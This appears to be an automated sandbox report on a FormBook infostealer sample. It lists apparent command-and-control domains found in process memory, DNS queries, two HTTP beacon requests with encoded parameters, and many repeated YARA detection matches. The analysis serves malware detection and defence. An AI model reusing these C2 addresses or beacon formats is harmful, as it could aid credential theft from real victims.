Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.controlplus.systemsReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.echadholisticbar.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.echadholisticbar.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.echadholisticbar.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hurricanevalleyatvjamboree.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ingrambaby.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ingrambaby.com/ar73/www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ingrambaby.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.innovantexclusive.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.innovantexclusive.com/ar73/www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.innovantexclusive.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jacksontcpassettlement.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kellnovaglobalfood.infoReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mogi.africa
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mogi.africa/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mogi.africaReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtevz.online/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtevz.online/ar73/r
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtevz.onlineReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickhealcareltd.co.uk
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quickhealcareltd.co.ukReferer:

Source: unknown

DNS traffic detected: queries for: www.mogi.africa

Source: C:\Windows\explorer.exe

Code function: 1_2_100D8F82 getaddrinfo,setsockopt,recv,

1_2_100D8F82

Source: global traffic	HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1Host: www.kellnovaglobalfood.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1Host: www.controlplus.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 7pECKdsaig.exe, 00000000.00000002.289211291.000000000145A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match	File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: 7pECKdsaig.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7pECKdsaig.exe, type: SAMPLE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
